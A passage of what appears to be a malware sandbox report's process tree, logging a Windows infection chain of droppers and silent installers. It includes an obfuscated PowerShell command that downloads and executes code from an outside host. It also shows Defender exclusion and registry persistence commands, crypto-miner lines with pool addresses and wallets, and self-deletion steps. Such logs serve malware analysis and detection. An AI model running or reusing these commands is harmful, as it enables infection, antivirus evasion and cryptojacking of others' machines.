- Suspicious use of SetWindowsHookEx
PID:972

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4140

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4428

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5084

C:\Users\Admin\AppData\Local\Temp\is-BGRQ9.tmp\winlthsth.exe
"C:\Users\Admin\AppData\Local\Temp\is-BGRQ9.tmp\winlthsth.exe"
1⤵
PID:4144
- C:\Users\Admin\AppData\Local\Temp\lilRhKoFA.exe
  "C:\Users\Admin\AppData\Local\Temp\lilRhKoFA.exe"
  2⤵
  PID:5012
- - C:\Users\Admin\AppData\Local\Temp\lilRhKoFA.exe
    "C:\Users\Admin\AppData\Local\Temp\lilRhKoFA.exe"
    3⤵
    PID:2904
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
  2⤵
  PID:4108
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
    3⤵
    PID:2840

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-20JMH.tmp\{app}\microsoft.cab -F:* %ProgramData%
1⤵
PID:4296
- C:\Windows\SysWOW64\expand.exe
  expand C:\Users\Admin\AppData\Local\Temp\is-20JMH.tmp\{app}\microsoft.cab -F:* C:\ProgramData
  2⤵
  PID:1388

C:\Users\Admin\AppData\Local\Temp\is-U0M8V.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U0M8V.tmp\IBInstaller_97039.tmp" /SL5="$10382,14574851,721408,C:\Users\Admin\AppData\Local\Temp\acu2xd4mz0z\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
1⤵
PID:4672
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^&param=
  2⤵
  PID:5932
- C:\ProgramData\regid.1993-06.com.microsoft\client32.exe
  "C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"
  2⤵
  PID:5860
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f
  2⤵
  PID:8448
- C:\Users\Admin\AppData\Local\Temp\is-20JMH.tmp\{app}\chrome_proxy.exe
  "C:\Users\Admin\AppData\Local\Temp\is-20JMH.tmp\{app}\chrome_proxy.exe"
  2⤵
  PID:3672

C:\Users\Admin\AppData\Local\Temp\is-ACP8B.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ACP8B.tmp\lylal220.tmp" /SL5="$40300,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
1⤵
PID:3848
- C:\Users\Admin\AppData\Local\Temp\is-P14SK.tmp\Microsoft.exe
  "C:\Users\Admin\AppData\Local\Temp\is-P14SK.tmp\Microsoft.exe" /S /UID=lylal220
  2⤵
  PID:4412
- - C:\Program Files\Windows Portable Devices\DTFJGDQOIO\irecord.exe
    "C:\Program Files\Windows Portable Devices\DTFJGDQOIO\irecord.exe" /VERYSILENT
    3⤵
    PID:5140
  - - C:\Users\Admin\AppData\Local\Temp\is-SG51A.tmp\irecord.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-SG51A.tmp\irecord.tmp" /SL5="$602D6,6265333,408064,C:\Program Files\Windows Portable Devices\DTFJGDQOIO\irecord.exe" /VERYSILENT
      4⤵
      PID:5104
- - C:\Users\Admin\AppData\Local\Temp\03-8b6e0-afb-87a9d-1a538d5b6d5c7\Kyhulanajae.exe
    "C:\Users\Admin\AppData\Local\Temp\03-8b6e0-afb-87a9d-1a538d5b6d5c7\Kyhulanajae.exe"
    3⤵
    PID:880
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
      dw20.exe -x -s 1956
      4⤵
      PID:1496
- - C:\Users\Admin\AppData\Local\Temp\84-9a137-377-65187-42b3e66744e98\SHaelagamibu.exe
    "C:\Users\Admin\AppData\Local\Temp\84-9a137-377-65187-42b3e66744e98\SHaelagamibu.exe"
    3⤵
    PID:2484
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hossokvd.reo\md6_6ydj.exe & exit
      4⤵
      PID:6944
    - - C:\Users\Admin\AppData\Local\Temp\hossokvd.reo\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\hossokvd.reo\md6_6ydj.exe
        5⤵
        
        PID:6772
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x2dr0gnu.jbm\askinstall31.exe & exit
      4⤵
      PID:6288
    - - C:\Users\Admin\AppData\Local\Temp\x2dr0gnu.jbm\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\x2dr0gnu.jbm\askinstall31.exe
        5⤵
        
        PID:4524
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ocmfjms.lq4\toolspab1.exe & exit
      4⤵
      PID:6780
    - - C:\Users\Admin\AppData\Local\Temp\1ocmfjms.lq4\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\1ocmfjms.lq4\toolspab1.exe
        5⤵
        
        PID:2080
      - C:\Users\Admin\AppData\Local\Temp\1ocmfjms.lq4\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\1ocmfjms.lq4\toolspab1.exe
        6⤵
        
        PID:6288
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ppwr22z1.1zu\GcleanerWW.exe /mixone & exit
      4⤵
      PID:7268
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vwuzscpu.2i2\setup_10.2_mix.exe & exit
      4⤵
      PID:7952
    - - C:\Users\Admin\AppData\Local\Temp\vwuzscpu.2i2\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\vwuzscpu.2i2\setup_10.2_mix.exe
        5⤵
        
        PID:7512
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\twiihucl.3c3\app.exe /8-2222 & exit
      4⤵
      PID:840
    - - C:\Users\Admin\AppData\Local\Temp\twiihucl.3c3\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\twiihucl.3c3\app.exe /8-2222
        5⤵
        
        PID:5520
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wexqrrpx.ulq\file.exe & exit
      4⤵
      PID:6908
    - - C:\Users\Admin\AppData\Local\Temp\wexqrrpx.ulq\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\wexqrrpx.ulq\file.exe
        5⤵
        
        PID:6604
      - C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
        6⤵
        
        PID:7924
        
        C:\Users\Admin\AppData\Local\Temp\38L4U7OAMY\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\38L4U7OAMY\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        7⤵
        
        PID:7752
        
        C:\Users\Admin\AppData\Local\Temp\38L4U7OAMY\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\38L4U7OAMY\multitimer.exe" 1 3.1617432595.606810139c857 101
        8⤵
        
        PID:8912
        
        C:\Users\Admin\AppData\Local\Temp\38L4U7OAMY\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\38L4U7OAMY\multitimer.exe" 2 3.1617432595.606810139c857
        9⤵
        
        PID:8800
        
        C:\Users\Admin\AppData\Local\Temp\i2k00t0oe0j\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\i2k00t0oe0j\cpyrix.exe" /VERYSILENT
        10⤵
        
        PID:3068
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        11⤵
        
        PID:6816
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        12⤵
        
        PID:8528
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        11⤵
        
        PID:8380
        
        C:\Users\Admin\AppData\Local\Temp\fa6fd07a-6684-45c9-8c44-8218189382d9\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fa6fd07a-6684-45c9-8c44-8218189382d9\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\fa6fd07a-6684-45c9-8c44-8218189382d9\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        12⤵
        
        PID:4020
        
        C:\Users\Admin\AppData\Local\Temp\fa6fd07a-6684-45c9-8c44-8218189382d9\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fa6fd07a-6684-45c9-8c44-8218189382d9\AdvancedRun.exe" /SpecialRun 4101d8 4020
        13⤵
        
        PID:9744
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        12⤵
        
        PID:10776
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        13⤵
        Delays execution with timeout.exe
        
        PID:1060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        12⤵
        
        PID:10624
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        12⤵
        
        PID:10376
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8380 -s 1656
        12⤵
        Program crash
        
        PID:7460
        
        C:\Users\Admin\AppData\Local\Temp\l4biizd2jyd\pzwkknzdzrj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\l4biizd2jyd\pzwkknzdzrj.exe" /ustwo INSTALL
        10⤵
        
        PID:5896
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "pzwkknzdzrj.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\l4biizd2jyd\pzwkknzdzrj.exe" & exit
        11⤵
        
        PID:380
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "pzwkknzdzrj.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:3200
        
        C:\Users\Admin\AppData\Local\Temp\z5gksiplt4r\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\z5gksiplt4r\vict.exe" /VERYSILENT /id=535
        10⤵
        
        PID:8084
        
        C:\Users\Admin\AppData\Local\Temp\is-166E1.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-166E1.tmp\vict.tmp" /SL5="$20668,870426,780800,C:\Users\Admin\AppData\Local\Temp\z5gksiplt4r\vict.exe" /VERYSILENT /id=535
        11⤵
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\is-BCTOC.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-BCTOC.tmp\win1host.exe" 535
        12⤵
        
        PID:7392
        
        C:\Users\Admin\AppData\Local\Temp\4t4vzz52uj4\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4t4vzz52uj4\app.exe" /8-23
        10⤵
        
        PID:8688
        
        C:\Users\Admin\AppData\Local\Temp\ai4520lokae\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ai4520lokae\Setup3310.exe" /Verysilent /subid=577
        10⤵
        
        PID:7604
        
        C:\Users\Admin\AppData\Local\Temp\is-FLGL0.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FLGL0.tmp\Setup3310.tmp" /SL5="$30670,138429,56832,C:\Users\Admin\AppData\Local\Temp\ai4520lokae\Setup3310.exe" /Verysilent /subid=577
        11⤵
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\is-BFB5K.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-BFB5K.tmp\Setup.exe" /Verysilent
        12⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\pi0yfgs0ojg\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pi0yfgs0ojg\vpn.exe" /silent /subid=482
        10⤵
        
        PID:9972
        
        C:\Users\Admin\AppData\Local\Temp\L21HCO3JQR\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\L21HCO3JQR\setups.exe" ll
        7⤵
        
        PID:6956
        
        C:\Users\Admin\AppData\Local\Temp\is-JPC1B.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JPC1B.tmp\setups.tmp" /SL5="$305E8,635399,250368,C:\Users\Admin\AppData\Local\Temp\L21HCO3JQR\setups.exe" ll
        8⤵
        
        PID:6484
      - C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
        6⤵
        
        PID:1084
      - C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"
        6⤵
        
        PID:7316
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        7⤵
        
        PID:8392
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        8⤵
        
        PID:8608
      - C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
        6⤵
        
        PID:8520
        
        C:\Users\Admin\AppData\Roaming\674C.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\674C.tmp.exe"
        7⤵
        
        PID:8852
        
        C:\Users\Admin\AppData\Roaming\674C.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\674C.tmp.exe"
        8⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Roaming\9A54.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\9A54.tmp.exe"
        7⤵
        
        PID:4904
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        8⤵
        
        PID:9152
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        8⤵
        
        PID:6936
        
        C:\Users\Admin\AppData\Roaming\9FF2.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\9FF2.tmp.exe"
        7⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\9FF2.tmp.exe
        8⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        9⤵
        Delays execution with timeout.exe
        
        PID:9304
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
        7⤵
        
        PID:5440
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        8⤵
        Runs ping.exe
        
        PID:9500
      - C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"
        6⤵
        
        PID:4876
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p2420i51.f1f\Four.exe & exit
      4⤵
      PID:6480
    - - C:\Users\Admin\AppData\Local\Temp\p2420i51.f1f\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\p2420i51.f1f\Four.exe
        5⤵
        
        PID:6888
      - C:\Users\Admin\AppData\Local\Temp\O6DUOTOO2A\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\O6DUOTOO2A\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        6⤵
        
        PID:7980
        
        C:\Users\Admin\AppData\Local\Temp\O6DUOTOO2A\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\O6DUOTOO2A\multitimer.exe" 1 3.1617432596.60681014538a7 104
        7⤵
        
        PID:8372
        
        C:\Users\Admin\AppData\Local\Temp\O6DUOTOO2A\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\O6DUOTOO2A\multitimer.exe" 2 3.1617432596.60681014538a7
        8⤵
        
        PID:7712
        
        C:\Users\Admin\AppData\Local\Temp\nhxlsjjinp2\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nhxlsjjinp2\cpyrix.exe" /VERYSILENT
        9⤵
        
        PID:2276
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        10⤵
        
        PID:10588
        
        C:\Users\Admin\AppData\Local\Temp\c35902dd-f681-4b3f-b9f8-311263faf0b3\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c35902dd-f681-4b3f-b9f8-311263faf0b3\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c35902dd-f681-4b3f-b9f8-311263faf0b3\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        11⤵
        
        PID:9484
        
        C:\Users\Admin\AppData\Local\Temp\c35902dd-f681-4b3f-b9f8-311263faf0b3\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c35902dd-f681-4b3f-b9f8-311263faf0b3\AdvancedRun.exe" /SpecialRun 4101d8 9484
        12⤵
        
        PID:11072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        11⤵
        
        PID:3356
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        11⤵
        
        PID:3520
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        12⤵
        Delays execution with timeout.exe
        
        PID:11108
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        11⤵
        
        PID:10492
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        10⤵
        
        PID:10676
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        11⤵
        
        PID:9784
        
        C:\Users\Admin\AppData\Local\Temp\fdkxgbbybem\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fdkxgbbybem\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:9732
        
        C:\Users\Admin\AppData\Local\Temp\is-F9NB9.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F9NB9.tmp\Setup3310.tmp" /SL5="$30488,138429,56832,C:\Users\Admin\AppData\Local\Temp\fdkxgbbybem\Setup3310.exe" /Verysilent /subid=577
        10⤵
        
        PID:8564
        
        C:\Users\Admin\AppData\Local\Temp\is-3EVP5.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-3EVP5.tmp\Setup.exe" /Verysilent
        11⤵
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\2foxhyf3mgr\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2foxhyf3mgr\app.exe" /8-23
        9⤵
        
        PID:9152
        
        C:\Users\Admin\AppData\Local\Temp\1bcvhmthfz0\iuknl4wtbif.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1bcvhmthfz0\iuknl4wtbif.exe" /ustwo INSTALL
        9⤵
        
        PID:5584
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "iuknl4wtbif.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1bcvhmthfz0\iuknl4wtbif.exe" & exit
        10⤵
        
        PID:3068
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "iuknl4wtbif.exe" /f
        11⤵
        Kills process with taskkill
        
        PID:10756
        
        C:\Users\Admin\AppData\Local\Temp\lullmmywya3\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lullmmywya3\vpn.exe" /silent /subid=482
        9⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\is-OMOML.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OMOML.tmp\vpn.tmp" /SL5="$706E4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\lullmmywya3\vpn.exe" /silent /subid=482
        10⤵
        
        PID:9620
        
        C:\Users\Admin\AppData\Local\Temp\klsqn022ryl\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\klsqn022ryl\vict.exe" /VERYSILENT /id=535
        9⤵
        
        PID:8872
        
        C:\Users\Admin\AppData\Local\Temp\is-V6DFV.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-V6DFV.tmp\vict.tmp" /SL5="$30682,870426,780800,C:\Users\Admin\AppData\Local\Temp\klsqn022ryl\vict.exe" /VERYSILENT /id=535
        10⤵
        
        PID:4168
        
        C:\Users\Admin\AppData\Local\Temp\is-783O9.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-783O9.tmp\win1host.exe" 535
        11⤵
        
        PID:10204
      - C:\Users\Admin\AppData\Local\Temp\9Q6IHJ5Y3Y\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9Q6IHJ5Y3Y\setups.exe" ll
        6⤵
        
        PID:8596
        
        C:\Users\Admin\AppData\Local\Temp\is-1I6DR.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1I6DR.tmp\setups.tmp" /SL5="$304C4,635399,250368,C:\Users\Admin\AppData\Local\Temp\9Q6IHJ5Y3Y\setups.exe" ll
        7⤵
        
        PID:8760

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5468

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6084

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6372

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:7944
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7207D764E0FEEDDFDAFBEA32BA3F9FCF C
  2⤵
  PID:5484
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding E490EA0A00E1C4B3C9F3E55923EFF70B
  2⤵
  PID:6980
- C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
  2⤵
  PID:10208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE3EFB.bat" "
    3⤵
    PID:9424
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
      4⤵
      Views/modifies file attributes
      PID:8704
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:9244
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:6448
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:3308
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE3EFB.bat"
      4⤵
      Views/modifies file attributes
      PID:11228
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE3EFB.bat" "
      4⤵
      PID:5904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" cls"
      4⤵
      PID:10900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE17DB.bat" "
    3⤵
    PID:9332
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
      4⤵
      Views/modifies file attributes
      PID:10096
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:5232
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE17DB.bat"
      4⤵
      Views/modifies file attributes
      PID:10688
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE17DB.bat" "
      4⤵
      PID:7100
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" cls"
      4⤵
      PID:9040

C:\Users\Admin\AppData\Local\Temp\is-9FG3V.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9FG3V.tmp\setups.tmp" /SL5="$2069A,635399,250368,C:\Users\Admin\AppData\Local\Temp\AI1VB44XQC\setups.exe" ll
1⤵
PID:6264

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6272

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7524

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:8904
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 8904 -s 936
  2⤵
  - Program crash
  PID:4808

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:9008

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\48fb42cacb594b06991b15e39d389639 /t 2572 /p 2588
1⤵
PID:2284

